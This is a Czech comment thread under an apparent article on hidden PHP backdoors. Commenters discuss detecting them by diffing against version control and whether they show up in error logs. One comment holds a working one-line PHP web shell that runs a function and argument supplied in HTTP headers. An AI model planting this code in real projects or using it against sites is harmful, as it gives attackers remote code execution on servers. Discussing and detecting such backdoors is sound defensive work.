Zpět na seznam článků     Zpět na článek

Komentáře ke článku

 
 
 BBCode
Luko | 178.255.168.*26.5.2014 22:23
Urodni puda cislo 2:
[link]
hodza | E-mail | Website14.5.2014 21:01
Ty složitější rostou třeba tady: [link]

----------
I přestože jsem paranoidní neznamená, že mě nedostanou...
mazací hlava | 185.8.237.*12.5.2014 22:46
php bekdůry sou k ničemu. nejlepší bekdůry sou v javě
shodan | 89.176.149.*11.5.2014 19:33
Sebevíc obfuskovaný backdoor je možné odhalit prostým diffem proti příslušné verzi ve vcs. Pokud ho tam ovšem nezanesl přímo vývojář či pokud útočník nenapadl samotný repozitář - v případě decentralizovaného vcs by si toho ale snad i někdo všiml :)).
RubberDuck | E-mail | Website5.5.2014 17:22
Sche Ras: Zrovna tenhle v error logu bude, protože při volání skriptu bez nadefonovaných proměnných HTTP_A a HTTP_B by mělo skončit varováním, že proměnné nejsou nadefinovány. A v případě volání proměnné HTTP_A jako funkce i k fatal error s chybou, že funkce musí být textový řetezec, což v tomto případě nebude.

----------
Sec-Cave.cz - [link]
Sche Ras | 89.22.65.*5.5.2014 15:58
Můj nejoblíbenější je tenhle, není totiž moc vidět ani v logu, ani ve zdrojáku:

<?php
$_SERVER['HTTP_A']($_SERVER['HTTP_B']);
?>

Stránky: 1